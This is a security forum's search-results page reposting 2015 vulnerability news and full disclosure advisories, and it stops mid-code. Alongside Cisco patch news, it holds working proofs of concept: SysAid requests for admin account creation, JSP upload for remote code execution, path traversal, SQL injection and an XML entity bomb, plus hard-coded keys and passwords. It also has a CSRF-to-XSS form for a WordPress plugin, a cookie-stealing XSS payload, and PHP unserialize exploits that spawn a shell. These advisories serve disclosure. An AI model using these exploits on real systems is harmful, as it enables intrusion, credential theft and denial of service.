Jump to content

Search the Community

Showing results for tags 'affected'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 10 results

  1. Remote code execution for some, denial of service for the rest of us Cisco has issued a string of patches for 16 faults including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets. One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service. "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine." Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority response thanks to lax message validation "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says . Further vulnerabilities coupled in that advisory lead to denial of service conditions. The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software rated 5 can be easily exploited by attackers sending a packet that would thanks to IPv6 extension headers trigger denial of service. It says this occurs because the headers are not typical of normal operation and says there are no work-arounds for the flaw meaning affected systems will require the patch. "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. "An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic." That exploit can cause a reload of the line card triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected. Source
  2. Hi, tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed. Full advisory below, and a copy can be obtained at [1]. 5 Metasploit modules have been released and currently awaiting merge in the moderation queue [2]. Regards, Pedro [1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5470 https://github.com/rapid7/metasploit-framework/pull/5471 https://github.com/rapid7/metasploit-framework/pull/5472 https://github.com/rapid7/metasploit-framework/pull/5473 https://github.com/rapid7/metasploit-framework/pull/5474 >> Multiple vulnerabilities in SysAid Help Desk 14.4 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 03/06/2015 / Last updated: 03/06/2015 >> Background on the affected product: "SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance." Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon. All vulnerabilities affect both the Windows and Linux versions unless otherwise noted. >> Technical details: 1) Vulnerability: Administrator account creation CVE-2015-2993 (same CVE as #10) Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 This creates an account with the following credentials: mr_lit:secret Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted. 2) Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution) CVE-2015-2994 Constraints: valid administrator account needed (see #1 to create a valid admin account) Affected versions: unknown, at least 14.4 POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------81351919525780 -----------------------------81351919525780 Content-Disposition: form-data; name="activation"; filename="whatevs.jsp" Content-Type: application/octet-stream <html><body><%out.println(System.getProperty("os.name"));%></body><html> -----------------------------81351919525780-- The response returns a page which contains the following: var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501"; var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501"; if(imageUrl != null && $.trim(imageUrl).length > 0) { document.getElementById("cropbox").src = imageUrl; document.getElementById("preview").src = thumbUrl; parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp"; Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP. 3) Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution) CVE-2015-2995 Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details. Affected versions: unknown, at least 14.3 and 14.4 POST /sysaid/rdslogs?rdsName=../../../../sample.war%00 <... WAR payload here ...> 4) Vulnerability: Arbitrary file download CVE-2015-2996 (same CVE as #8) Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path) Affected versions: unknown, at least 14.4 GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd 5) Vulnerability: Path disclosure CVE-2015-2997 Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4; only works on the Linux version POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters> Metasploit PoC: large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))), 'ctype' => 'application/octet-stream', 'vars_get' => { 'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)), 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) } }) The response (res.body.to_s) will be similar to: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD><TITLE>Error</TITLE></HEAD> <BODY> <H1>Internal Error No#14</H1> <H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2> </BODY></HTML> The tomcat path is revealed between the H2 tags. 6) Vulnerability: Use of hard-coded cryptographic key CVE-2015-2998 Constraints: N/A Affected versions: unknown, at least 14.4 SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file. Algorithm: DES password based encryption with MD5 hash Key: "inigomontoya" Salt: [-87, -101, -56, 50, 86, 53, -29, 3] Iterations: 19 7) Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp CVE-2015-2999 Constraints: valid administrator account needed Affected versions: unknown, at least 14.4 a) POST /sysaid/genericreport HTTP/1.1 action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin Parameters: groupFilter action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no Parameters: customSQL action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin Parameters: customSQL (3 different payloads are shown because the reportName parameter seems to change which parameters have the injection) POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= Parameter: dir c) POST /sysaid/RFCGantt.jsp HTTP/1.1 listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true Accepts injection between $$ in ganttSQL parameter. 8) Vulnerability: Denial of service CVE-2015-2996 (same CVE as #4) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 9) Vulnerability: XML Entity Expansion (leading to denial of service) CVE-2015-3000 Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 a) POST /sysaid/agententry?deflate=0 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> POST /sysaid/rdsmonitoringresponse <lol bomb in POST data> c) POST /sysaid/androidactions <lol bomb in POST data> These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 10) Vulnerability: Uncontrolled file overwrite CVE-2015-2993 (same CVE as #1) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker. 11) Vulnerability: Use of hard-coded password for the SQL Server Express administrator account CVE-2015-3001 Constraints: N/A Affected versions: unknown, at least 14.4 When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1". >> Fix: Upgrade to version 15.2 or higher. Source
  3. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,00 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected. The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user." The Borg says patches for the bug are available but warns there are no workarounds. <pSuccessful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild. Source
  4. https://wordpress.org/plugins/yet-another-related-posts-plugin/ Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to *code execution/administrator actions* when the injected code is triggered by an admin user. injected javascript code is triggered on any post page. Vulnerability Scope XSS RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof of Concept <body onload="document.getElementById('payload_form').submit()" > <form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" > <input type='hidden' name='recent_number' value='12' > <input type='hidden' name='recent_units' value='month' > <input type='hidden' name='threshold' value='5' > <input type='hidden' name='weight[title]' value='no' > <input type='hidden' name='weight[body]' value='no' > <input type='hidden' name='tax[category]' value='no' > <input type='hidden' name='tax[post_tag]' value='consider' > <input type='hidden' name='auto_display_post_types[post]' value='on' > <input type='hidden' name='auto_display_post_types[/page][page]' value='on' > <input type='hidden' name='auto_display_post_types[attachment]' value='on' > <input type='hidden' name='auto_display_archive' value='true' > <input type='hidden' name='limit' value='1' > <input type='hidden' name='use_template' value='builtin' > <input type='hidden' name='thumbnails_heading' value='Related posts:' > <input type='hidden' name='no_results' value='<script>alert(1);</script>' > <input type='hidden' name='before_related' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_related' value='</li>' > <input type='hidden' name='before_title' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_title' value='</li>' > <input type='hidden' name='show_excerpt' value='true' > <input type='hidden' name='excerpt_length' value='10' > <input type='hidden' name='before_post' value='+<small>' > <input type='hidden' name='after_post' value='</small>' > <input type='hidden' name='order' value='post_date ASC' > <input type='hidden' name='promote_yarpp' value='true' > <input type='hidden' name='rss_display' value='true' > <input type='hidden' name='rss_limit' value='1' > <input type='hidden' name='rss_use_template' value='builtin' > <input type='hidden' name='rss_thumbnails_heading' value='Related posts:' > <input type='hidden' name='rss_no_results' value='No Results' > <input type='hidden' name='rss_before_related' value='<li>' > <input type='hidden' name='rss_after_related' value='</li>' > <input type='hidden' name='rss_before_title' value='<li>' > <input type='hidden' name='rss_after_title' value='</li>' > <input type='hidden' name='rss_show_excerpt' value='true' > <input type='hidden' name='rss_excerpt_length' value='10' > <input type='hidden' name='rss_before_post' value='+<small>' > <input type='hidden' name='rss_after_post' value='</small>' > <input type='hidden' name='rss_order' value='score DESC' > <input type='hidden' name='rss_promote_yarpp' value='true' > <input type='hidden' name='update_yarpp' value='Save Changes' > </form></body> Fix No Fix Available at The Moment. Timeline Notified Vendor - No Reply Notified Vendor Again- No Reply Publish Disclosure @evex_1337 [url]http://research.evex.pw/?vuln=15[/url]Homepage Source
  5. # Type Confusion Infoleak Vulnerability in unserialize() with SoapFault Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.4.28 > A type confusion vulnerability was discovered in unserialize() with SoapFault object's __toString() magic method that can be abused for leaking arbitrary memory blocks. Affected Versions ------------ Affected is PHP 5.6 < 5.6.8 Affected is PHP 5.5 < 5.5.24 Affected is PHP 5.4 < 5.4.40 Affected is PHP 5.3 <= 5.3.29 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` PHP_METHOD(SoapFault, __toString) { ... faultcode = zend_read_property(soap_fault_class_entry, this_ptr, "faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC); faultstring = zend_read_property(soap_fault_class_entry, this_ptr, "faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC); file = zend_read_property(soap_fault_class_entry, this_ptr, "file", sizeof("file")-1, 1 TSRMLS_CC); line = zend_read_property(soap_fault_class_entry, this_ptr, "line", sizeof("line")-1, 1 TSRMLS_CC); ... len = spprintf(&str, 0, "SoapFault exception: [%s] %s in %s:%ld\nStack trace:\n%s", Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring), Z_STRVAL_P(file), Z_LVAL_P(line), Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n"); zval_ptr_dtor(&trace); RETURN_STRINGL(str, len, 0); } ``` The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a integer-type zval that start from this memory address. If the memory address is an invalid memory position, it should result in a crash. The Z_LVAL_P macro lead to leaking memory address via a string-type zval that this string value stored. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}'; echo unserialize($data); ?> ``` Test the PoC on the command line, then output some memory blocks and memory address: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run test.php SoapFault exception: [UH??AWAVSPI??I??H???? in UH??AWAVAUATSH???:4307253992 ] UH??SPD???*?????t"H? Stack trace: #0 test.php(4): unserialize('O:9:"SoapFault"...') #1 {main} Process 889 exited with status = 0 (0x00000000) Source
  6. #Use After Free Vulnerability in unserialize() Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3 - Release Date: 2015.3.20 > A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code. Affected Versions ------------ Affected is PHP 5.6 < 5.6.7 Affected is PHP 5.5 < 5.5.23 Affected is PHP 5.4 < 5.4.39 Affected is PHP 5 <= 5.3.29 Affected is PHP 4 <= 4.4.9 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements) { zval retval; zval fname; if (Z_TYPE_P(rval) != IS_OBJECT) { return 0; } //??? TODO: resize before if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval), elements, 1)) { return 0; } ZVAL_DEREF(rval); if (Z_OBJCE_P(rval) != PHP_IC_ENTRY && zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1)) { ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1); BG(serialize_lock)++; call_user_function_ex(CG(function_table), rval, &fname, &retval, 0, 0, 1, NULL); ``` A specially defined __wakeup() magic method lead to various problems. The simple code: ``` <?php class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}'); ?> ``` Object properties assignment or destroy operation leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\xff\xff\xff\xff"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}'; $z = unserialize($data2); intval($z[2]); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } ?> ``` Test the PoC on the command line, then any PHP code can be executed: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) ``` Source
  7. A four year old Adobe Flash patch did not properly resolve a vulnerable Flex application, and attackers can exploit the bug, which is said to affect some 30 percent of Alexa’s top 10 most popular sites in the world. LinkedIn security researcher Luca Carettoni and Mauro Gentile, a security consultant at Minded Security, presented their findings showing that Shockwave Flash files compiled by the vulnerable Flex software developers kit remain exploitable in fully updated Web browsers and Flash plugins. The researchers released partial details for the vulnerability along with mitigation information. They plan to release the full details of the bug and some proof-of-concept exploit in the near future, once they are confident there is a better understanding of the bug within the general public. Carettoni and Gentile have already informed the maintainers of popular websites affected by the vulnerability, and Adobe. If properly exploited, the bug could allow an attacker to steal information from affected systems through a same origin request forgery and even perform actions on behalf of users running vulnerable versions by performing cross-site forgery requests. In either case, the attackers would have to compel their victims to visit a maliciously crafted Web page. Practically speaking, it is possible to force the affected Flash movies to perform Same-Origin requests and return the responses back to the attacker In other words, the researchers say, hosting vulnerable SWF files leads to an “indirect” Same-Origin-Policy bypass in fully patched web browsers and plugins. “Practically speaking, it is possible to force the affected Flash movies to perform Same-Origin requests and return the responses back to the attacker,” the pair of researchers said in a blog post. “Since HTTP requests contain cookies and are issued from the victim’s domain, HTTP responses may contain private information including anti-CSRF tokens and user’s data.” Potential mitigations include recompiling Flex SDKs along with their static libraries, patching with the official Adobe patch tool and simply deleting them if they are not used. You can find Carettoni and Gentile‘s analysis on their respective sites, though these are reposts, so both reports contain the same content. Their slide’s are embedded below: Source
  8. ##################################### Title:- Reflected cross-site scripting(XSS) Vulnerability in Manage Engine AD Audit Manager Plus Admin Panel(Build 6270) Author: Harish Ramadoss - Help AG Middle East Vendor: ZOHO Corp Product: Manage Engine AD Audit Manager Plus Version: All versions below Build 6270 are mostly affected Tested Version: Build 6270 Severity: Medium CVE Reference: CVE-2015-1026 # About the Product: ADManager Plus is a Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities. The software handles a variety of complex tasks like Bulk Management of User accounts and other AD objects, Delegate Role based access to Help Desk Technicians, and generates an exhaustive list of AD Reports, # Description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. # Vulnerability Class: Reflected cross-site scripting(XSS) - hhttps://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 # How to Reproduce: (POC): 1. “technicianSearchText” parameter is vulnerable to XSS on “Help Desk Technician” page. The page can be found at : AD Delegation -> Help Desk Technician 2. "rolesSearchText" parameter is vulnerable to XSS on “Help Desk Roles” page. The page can be found at : AD Delegation -> Help Desk Roles Proof of Concept code to test XSS : <b onmouseover=alert(document.cookie)>Hover over me!</b> # Disclosure: Discovered: December 08, 2014 Vendor Notification: Jan 22, 2015 Public Disclosure: Mar 10, 2015 # Affected Targets: All versions below Build 6270 are mostly affected. On all platforms (Actually platform doesn't affect the issue). # credits: Harish Ramadoss Information Security Analyst Help AG Middle East #References: [1] help AG middle East http://www.helpag.com/. [2] https://www.manageengine.com/products/ad-manager/ [4] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29(XSS) [5] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. Source
  9. Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273] Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.6 Affected is PHP 5.5 < 5.5.22 Affected is PHP 5.4 < 5.4.38 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht) { zval *z_date; zval *z_timezone; zval *z_timezone_type; zval tmp_obj; timelib_tzinfo *tzi; php_timezone_obj *tzobj; z_date = zend_hash_str_find(myht, "date", sizeof("data")-1); if (z_date) { convert_to_string(z_date); z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1); if (z_timezone_type) { convert_to_long(z_timezone_type); z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1); if (z_timezone) { convert_to_string(z_timezone); ... static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC) { zval **z_timezone = NULL; zval **z_timezone_type = NULL; if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) { if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) { convert_to_long(*z_timezone_type); if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) { return SUCCESS; } } } return FAILURE; } The convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 